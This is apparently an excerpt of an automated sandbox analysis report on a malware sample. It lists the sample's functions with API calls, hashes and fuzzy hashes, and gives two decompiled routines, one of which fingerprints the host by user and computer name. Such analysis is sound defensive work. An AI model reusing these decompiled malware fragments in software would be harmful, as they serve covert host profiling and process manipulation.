                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen
                              • String ID:
                              • API String ID: 1659193697-0
                              • Opcode ID: 660e00084b17582a35aaadaaa4cb925e33696d8755f36772b2be3d65a76af000
                              • Instruction ID: 73f1726a2cf9e77d3e2190c6fd49b64f026e9c52ba43a2fc5de676748eb1f843
                              • Opcode Fuzzy Hash: 660e00084b17582a35aaadaaa4cb925e33696d8755f36772b2be3d65a76af000
                              • Instruction Fuzzy Hash: 92412171E00219AFCB24DFA9C884A6EFBFAFF84204F14846DE555E7200E775EE058B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CA62A, Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053E3C8A: RtlEnterCriticalSection.NTDLL(053F0488), ref: 053E3C92
                                • Part of subcall function 053E3C8A: RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053E3CA7
                                • Part of subcall function 053E3C8A: InterlockedIncrement.KERNEL32(0000001C), ref: 053E3CC0
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 053CA661
                              • memcpy.NTDLL(00000000,?,?), ref: 053CA672
                              • lstrcmpi.KERNEL32(00000002,?), ref: 053CA6B8
                              • memcpy.NTDLL(00000000,?,?), ref: 053CA6CC
                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 053CA712
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 733514052-0
                              • Opcode ID: 2afa14c7c40947caaf8b7499db6bd91208bcee3458d09548007decc85f0ec7a5
                              • Instruction ID: 16069eabbeebaca8979cc6b260bff8fbf028bea21d590a464bc9e31f0446ab7e
                              • Opcode Fuzzy Hash: 2afa14c7c40947caaf8b7499db6bd91208bcee3458d09548007decc85f0ec7a5
                              • Instruction Fuzzy Hash: 53317C76A10219AFDB119FE8DC89AAE7FB9FB04314F14406DF906E7240EB719D548BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CBD8E, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053CC05C: lstrlen.KERNEL32(00000000,00000000,?,00000000,053CBDA2,00000000,00000000,00000000,00000000), ref: 053CC068
                              • RtlEnterCriticalSection.NTDLL(053F0488), ref: 053CBDB8
                              • RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053CBDCB
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 053CBDDC
                              • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 053CBE47
                              • InterlockedIncrement.KERNEL32(053F049C), ref: 053CBE5E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                              • String ID:
                              • API String ID: 3915436794-0
                              • Opcode ID: adfa24cac0715bb8e77741064128682a6ba6d9f65ca3dda769d517020d802d09
                              • Instruction ID: 856c80ca5c163db63e27bbfb227cd3ea1fc6ca56dc29864bdff6245eae7ccff7
                              • Opcode Fuzzy Hash: adfa24cac0715bb8e77741064128682a6ba6d9f65ca3dda769d517020d802d09
                              • Instruction Fuzzy Hash: 1F31AA31A142069BCB25CF28D85A92AFBF8FB45720F40495DF99A87251CB30DC21CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DA7A3, Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?,?,00000000,00000000,053C8E67,00000000,747DF5B0,053C5001,?,00000001,?,00000000), ref: 053DA7C3
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053DA7D8
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053DA7F4
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DA809
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053DA81D
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad$AddressProc
                              • String ID:
                              • API String ID: 1469910268-0
                              • Opcode ID: 5806f222b29f0b1a0ee0755952d1f66cdd67a6ba1054580d901c874128282da9
                              • Instruction ID: 8c8cfb3ed070cc97263dad53fe0b38ed63907a0d85e3c2cad255fcaf304cad99
                              • Opcode Fuzzy Hash: 5806f222b29f0b1a0ee0755952d1f66cdd67a6ba1054580d901c874128282da9
                              • Instruction Fuzzy Hash: BC318B766602049FC716CB5CE88AA597BFDFB09310F00001AF51ADF391DBB0E942CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D8941, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D8941() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x74785522
						_v12 = _v12 + _t11;
						_t63 = E049D55DC(_v12 + _t11 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E049D6DFA(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x49d642f
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                              0x049d894f
                              0x049d8952
                              0x049d8955
                              0x049d895b
                              0x049d8960
                              0x049d8966
                              0x049d896e
                              0x049d8971
                              0x049d8977
                              0x049d897c
                              0x049d8985
                              0x049d8989
                              0x049d8996
                              0x049d899a
                              0x049d899c
                              0x049d89a0
                              0x049d89a3
                              0x049d89b3
                              0x049d8a05
                              0x049d8a06
                              0x049d89b5
                              0x049d89b8
                              0x049d89bf
                              0x049d89c2
                              0x049d89d5
                              0x00000000
                              0x049d89d7
                              0x049d89da
                              0x049d89df
                              0x049d89ed
                              0x049d89f0
                              0x049d89f8
                              0x049d89fb
                              0x00000000
                              0x049d89fd
                              0x049d89fd
                              0x049d8a00
                              0x049d8a00
                              0x049d89fb
                              0x049d89d5
                              0x049d8a0b
                              0x049d8a0c
                              0x049d897c
                              0x049d8a12

                              APIs
                              • GetUserNameW.ADVAPI32(00000000,049D642D), ref: 049D8955
                              • GetComputerNameW.KERNEL32(00000000,049D642D), ref: 049D8971
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • GetUserNameW.ADVAPI32(00000000,049D642D), ref: 049D89AB
                              • GetComputerNameW.KERNEL32(049D642D,74785520), ref: 049D89CD
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,049D642D,00000000,049D642F,00000000,00000000,?,74785520,049D642D), ref: 049D89F0
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                              • String ID:
                              • API String ID: 3850880919-0
                              • Opcode ID: 2c990c7955c414df2ceefded344fb04ce44b777f510cc1fa2b5bacfca52454ad
                              • Instruction ID: c0e8e5924d9abbebd625370db115b93ab86eb61bcae68734cef20cb9b7c2eb9f
                              • Opcode Fuzzy Hash: 2c990c7955c414df2ceefded344fb04ce44b777f510cc1fa2b5bacfca52454ad
                              • Instruction Fuzzy Hash: B7210876900148FFDB11DFA8C9848EEBBBCEE44344B5184BAE505E7201DB34AF44DB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DFF7D, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD62B
                                • Part of subcall function 053DD619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD644
                                • Part of subcall function 053DD619: GetCurrentThreadId.KERNEL32 ref: 053DD651
                                • Part of subcall function 053DD619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5,?,?,?,?,?,053C43B5,00000000), ref: 053DD65D
                                • Part of subcall function 053DD619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,053E2F93,00000000,?,00000000,053C43B5), ref: 053DD66B
                                • Part of subcall function 053DD619: lstrcpy.KERNEL32(00000000), ref: 053DD68D
                              • DeleteFileA.KERNEL32(00000000,000004D2), ref: 053DFFA0
                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 053DFFA9
                              • GetLastError.KERNEL32 ref: 053DFFB3
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053E0072
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 3543646443-0
                              • Opcode ID: f4d68341a322818275c00119f165e51c46b16e150c6a64613e1d8d3fc82c2e05
                              • Instruction ID: 644f983dffe886cfa844ad458bf7680e4bbdec68df9d4f048b6e1aeb48d98c6d
                              • Opcode Fuzzy Hash: f4d68341a322818275c00119f165e51c46b16e150c6a64613e1d8d3fc82c2e05
                              • Instruction Fuzzy Hash: A9215C72651624BBC610EBA4FC8DDAB3BECAB4A321F040611B616CB1D1EAB4E504C7B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DC474, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(?,0000002C), ref: 053DC485
                              • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 053DC49E
                              • StrTrimA.SHLWAPI(?,?), ref: 053DC4C6
                              • StrTrimA.SHLWAPI(00000000,?), ref: 053DC4D5
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 053DC50C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Trim$FreeHeap
                              • String ID:
                              • API String ID: 2132463267-0
                              • Opcode ID: d976dc75eef7b0983817b71f29161c7b58e06a781db7b15068f9553f33c5aed9
                              • Instruction ID: 8bb09f46f77592357327768598174310e8819d4d8f65e9d727286270fa862b06
                              • Opcode Fuzzy Hash: d976dc75eef7b0983817b71f29161c7b58e06a781db7b15068f9553f33c5aed9
                              • Instruction Fuzzy Hash: 9611547722021ABBD7229B59DC8DFABBFBDFB44794F101021BA06DB181DAA0DD00D760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E4EFF, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(053E4E4B,?,?,?,?,00000008,053E4E4B,00000000,?), ref: 053E4F1C
                              • memcpy.NTDLL(053E4E4B,?,00000009,?,?,?,?,00000008,053E4E4B,00000000,?), ref: 053E4F3E
                              • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 053E4F56
                              • lstrlenW.KERNEL32(00000000,00000001,053E4E4B,?,?,?,?,?,?,?,00000008,053E4E4B,00000000,?), ref: 053E4F76
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,053E4E4B,00000000,?), ref: 053E4F9B
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                              • String ID:
                              • API String ID: 3065863707-0
                              • Opcode ID: cb2c3d402ea6baffdab6847f56d970fffd0c37ee92391510ce7f28c676c36f8d
                              • Instruction ID: 344da98a53242422c9eaf0ee587b0c0ca79aae3581223eaf9fbe37de97a55b4a
                              • Opcode Fuzzy Hash: cb2c3d402ea6baffdab6847f56d970fffd0c37ee92391510ce7f28c676c36f8d
                              • Instruction Fuzzy Hash: 5D116076E10208BBDF219BA5D84EF8E7FBDAB48710F008055F905EA281EA74D609CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D46D9, Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcmpi.KERNEL32(00000000,?), ref: 053D4708
                              • RtlEnterCriticalSection.NTDLL(053F0488), ref: 053D4715
                              • RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053D4728
                              • lstrcmpi.KERNEL32(053F04A0,00000000), ref: 053D4748
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,053C2A18,00000000), ref: 053D475C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                              • String ID:
                              • API String ID: 1266740956-0
                              • Opcode ID: d8d05771eca3ecf775eb25e82c6dba0dcb47f8e1aa719166d03a19959a275737
                              • Instruction ID: bf03b6a31ce9f29e13d3710e7f6aa8a95278c18c3e93a4337affc8344d0d57a3
                              • Opcode Fuzzy Hash: d8d05771eca3ecf775eb25e82c6dba0dcb47f8e1aa719166d03a19959a275737
                              • Instruction Fuzzy Hash: F8119D32910205AFCB48CF5CD88EA9ABBFCFB45324F454119F55ADB281D7B4AD148FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CF559, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053CC05C: lstrlen.KERNEL32(00000000,00000000,?,00000000,053CBDA2,00000000,00000000,00000000,00000000), ref: 053CC068
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 053CF582
                              • memcpy.NTDLL(00000000,?,?), ref: 053CF595
                              • RtlEnterCriticalSection.NTDLL(053F0488), ref: 053CF5A6
                              • RtlLeaveCriticalSection.NTDLL(053F0488), ref: 053CF5BB
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 053CF5F3
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                              • String ID:
                              • API String ID: 2349942465-0
                              • Opcode ID: 27cc727df00acd52f2ef585bb26ad615401e705dba67428c70a9d15da0172142
                              • Instruction ID: f19180faa144959ccb7934fe89330c0ec953ef37d34ba474f9397e4f362b197e
                              • Opcode Fuzzy Hash: 27cc727df00acd52f2ef585bb26ad615401e705dba67428c70a9d15da0172142
                              • Instruction Fuzzy Hash: 5D11E076215211AFC3255E189C8DC2B7FADEB85325F01056EFA469B241CA315C148BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C8712, Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000000,?,?,?,053C4811,?,?,00000000), ref: 053C8728
                              • lstrlen.KERNEL32(?,?,?,?,053C4811,?,?,00000000), ref: 053C872F
                              • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 053C873D
                                • Part of subcall function 053C6BCF: GetLocalTime.KERNEL32(?,?,053DA620,00000000,00000001), ref: 053C6BD9
                                • Part of subcall function 053C6BCF: wsprintfA.USER32 ref: 053C6C0C
                              • wsprintfA.USER32 ref: 053C875F
                                • Part of subcall function 053CA182: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,053C8787,00000000,?,00000000,00000000,00000006,00000000), ref: 053CA1A0
                                • Part of subcall function 053CA182: wsprintfA.USER32 ref: 053CA1C5
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,00000000), ref: 053C8790
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                              • String ID:
                              • API String ID: 3847261958-0
                              • Opcode ID: de8beca27f05050a64f26a55b36a268a560ed5ce5ea502d9ca32db48454e5db8
                              • Instruction ID: 18cb1997d20787e95c17887a6f6fd46c9b6c1b89e6e3dd7fac6114747182e237
                              • Opcode Fuzzy Hash: de8beca27f05050a64f26a55b36a268a560ed5ce5ea502d9ca32db48454e5db8
                              • Instruction Fuzzy Hash: 0C01D676100218BFCB222F29DC4DD9B7F6EFF80364F008025FD099A251EA328E11CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DBF04, Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D34A4: lstrlen.KERNEL32(053CEFEF,747DF560,00000000,?,00000000,053DBF21,?,00000000,?,?,053CEFEF,00000020), ref: 053D34B3
                                • Part of subcall function 053D34A4: mbstowcs.NTDLL ref: 053D34CF
                              • lstrlenW.KERNEL32(00000000,747DF560,00000000,?,00000000,?,?,053CEFEF,00000020), ref: 053DBF30
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053DBF42
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,053CEFEF,00000020), ref: 053DBF5F
                              • lstrlenW.KERNEL32(00000000,?,?,053CEFEF,00000020), ref: 053DBF6B
                              • HeapFree.KERNEL32(00000000,00000000,?,?,053CEFEF,00000020), ref: 053DBF7F
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                              • String ID:
                              • API String ID: 3403466626-0
                              • Opcode ID: 0a66f9715a737e348a559133d9ff2a7f652d480088bd170b5b294dfa45f4fa17
                              • Instruction ID: 1c2e22dee415415b8b80b969820a094a5910514ffda532b1a7871dab9bb3e87d
                              • Opcode Fuzzy Hash: 0a66f9715a737e348a559133d9ff2a7f652d480088bd170b5b294dfa45f4fa17
                              • Instruction Fuzzy Hash: 2B016976110208EFC7229B98EC8AF9ABBFCEB49314F014021F5069F291CBB09D04CB71
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C54B6, Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C54D7
                              • GetProcAddress.KERNEL32(00000000,?), ref: 053C54F0
                              • OpenProcess.KERNEL32(00000400,00000000,053D3B88,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C550D
                              • IsWow64Process.KERNEL32(00000000,00000000,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C551E
                              • CloseHandle.KERNEL32(00000000,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C5531
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HandleProcess$AddressCloseModuleOpenProcWow64
                              • String ID:
                              • API String ID: 4157061983-0
                              • Opcode ID: 641e1ecf3e167838426e358a5358ee9754d58e5f77be2989e6011f66d06e7b07
                              • Instruction ID: f68d146f6c92d4fcddc5babf399a16a1e513c60cd1e8b5f7944d25e3e5a8002f
                              • Opcode Fuzzy Hash: 641e1ecf3e167838426e358a5358ee9754d58e5f77be2989e6011f66d06e7b07
                              • Instruction Fuzzy Hash: 8A015B75810108EF8B21DF69EC4D8AE7FADFB85351F20415AF507DB141EA71AA01CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D3CD3, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32 ref: 053D3CF3
                              • GetModuleHandleA.KERNEL32 ref: 053D3D01
                              • LoadLibraryExW.KERNEL32(?,?,?), ref: 053D3D0E
                              • GetModuleHandleA.KERNEL32 ref: 053D3D25
                              • GetModuleHandleA.KERNEL32 ref: 053D3D31
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HandleModule$LibraryLoad
                              • String ID:
                              • API String ID: 1178273743-0
                              • Opcode ID: d41e17ec773ce4488c82726acae0c5ad227081c886ac53f0cf8f6e6a3f632348
                              • Instruction ID: ba9e715f9eeffb474a45b06500532c8a1f6def9d3d4578b8c9e4032e744412ac
                              • Opcode Fuzzy Hash: d41e17ec773ce4488c82726acae0c5ad227081c886ac53f0cf8f6e6a3f632348
                              • Instruction Fuzzy Hash: 3F01A23171424A9F9B115F69EC0196ABFFEFF45360B040435F914CA1A0DFB1CC218EA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DF568, Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,053E784E), ref: 053DF56E
                              • StrTrimA.SHLWAPI(00000001,?,?,053E784E), ref: 053DF591
                              • StrTrimA.SHLWAPI(00000000,?,?,053E784E), ref: 053DF5A0
                              • _strupr.NTDLL ref: 053DF5A3
                              • lstrlen.KERNEL32(00000000,053E784E), ref: 053DF5AB
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Trim$_struprlstrlen
                              • String ID:
                              • API String ID: 2280331511-0
                              • Opcode ID: 03357a6f90e35ef719a2e03e97c6d90825ab9c7a7492492370ac4832c56fd2b1
                              • Instruction ID: afa6e4914ee0cf7a38ebcf51ca25363d21be9124db19d4aa83b89297d8cae612
                              • Opcode Fuzzy Hash: 03357a6f90e35ef719a2e03e97c6d90825ab9c7a7492492370ac4832c56fd2b1
                              • Instruction Fuzzy Hash: 3BF08732220105AFE7199B28EC8EE3A6BACEB49710F100109F802CF280DEA0AD0187A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DE6A2, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(053F0460), ref: 053DE6AD
                              • RtlLeaveCriticalSection.NTDLL(053F0460), ref: 053DE6BE
                              • VirtualProtect.KERNEL32(00000001,00000004,00000040,0000007F,?,?,053D21BF,00000000,053F01F4,053F0488,053C5BD7,00000003,?,?,053D738E,00000000), ref: 053DE6D5
                              • VirtualProtect.KERNEL32(00000001,00000004,0000007F,0000007F,?,?,053D21BF,00000000,053F01F4,053F0488,053C5BD7,00000003,?,?,053D738E,00000000), ref: 053DE6EF
                              • GetLastError.KERNEL32(?,?,053D21BF,00000000,053F01F4,053F0488,053C5BD7,00000003,?,?,053D738E,00000000,?,053F01F4), ref: 053DE6FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                              • String ID:
                              • API String ID: 653387826-0
                              • Opcode ID: 9bc31fc5874882ba3bd2c2d9b9636448d6af6ecca52b6d1e01b297e134c28f86
                              • Instruction ID: 6d2ea948b742ce953cdbb68ff5b1927f24bed8fdd063ad44db412167bbdf65d0
                              • Opcode Fuzzy Hash: 9bc31fc5874882ba3bd2c2d9b9636448d6af6ecca52b6d1e01b297e134c28f86
                              • Instruction Fuzzy Hash: 08018F76200304AFD7219F18DC09D6ABBFDEF84320B114518FA469B290DB70ED019F24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D2CBF, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D2CBF(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x49dd2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x49dd294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x49dd290 = _t6;
					 *0x49dd29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x49dd28c = _t7;
					if(_t7 == 0) {
						 *0x49dd28c =  *0x49dd28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                              0x049d2cc7
                              0x049d2ccf
                              0x049d2cd4
                              0x00000000
                              0x049d2d29
                              0x049d2cd6
                              0x049d2cde
                              0x049d2ce6
                              0x049d2ce6
                              0x049d2d26
                              0x00000000
                              0x049d2d26
                              0x049d2ce8
                              0x049d2ce8
                              0x049d2ced
                              0x049d2cff
                              0x049d2d04
                              0x049d2d0a
                              0x049d2d12
                              0x049d2d17
                              0x049d2d19
                              0x049d2d19
                              0x00000000
                              0x049d2d20
                              0x049d2ce2
                              0x00000000
                              0x00000000
                              0x049d2ce4
                              0x00000000

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,049D233B,?), ref: 049D2CC7
                              • GetVersion.KERNEL32 ref: 049D2CD6
                              • GetCurrentProcessId.KERNEL32 ref: 049D2CED
                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 049D2D0A
                              • GetLastError.KERNEL32 ref: 049D2D29
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                              • String ID:
                              • API String ID: 2270775618-0
                              • Opcode ID: c10ea4f6580f341f96c1253441d42e0094e37e44a53a5f22a0ae098cfe4c70a7
                              • Instruction ID: 3640bba56a48b979cd2951cb58a1f4887650b4fe399c0cf934520468c2ed432c
                              • Opcode Fuzzy Hash: c10ea4f6580f341f96c1253441d42e0094e37e44a53a5f22a0ae098cfe4c70a7
                              • Instruction Fuzzy Hash: E7F04F7068A305DEEB608F34ED097253F69EB04751F108676E646CB1C4D3789881DF24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CB778, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17memoryCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedDecrement.KERNEL32(0000001C), ref: 053CB77C
                              • HeapFree.KERNEL32(00000000,?,77E34620,?,?,053E29F2,00000000), ref: 053CB797
                              • HeapFree.KERNEL32(00000000,00000000,?,?,053E29F2,00000000), ref: 053CB7A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FreeHeap$DecrementInterlocked
                              • String ID: t
                              • API String ID: 2942576174-2238339752
                              • Opcode ID: 831fde956b98a8a6311446d6628d15b2d9647b208f237ecc351a515a5a823f7c
                              • Instruction ID: 8ad69048b7f7a7e3329f57ee566da0ba7df0a7da01227352dc70465ab0b1e8fa
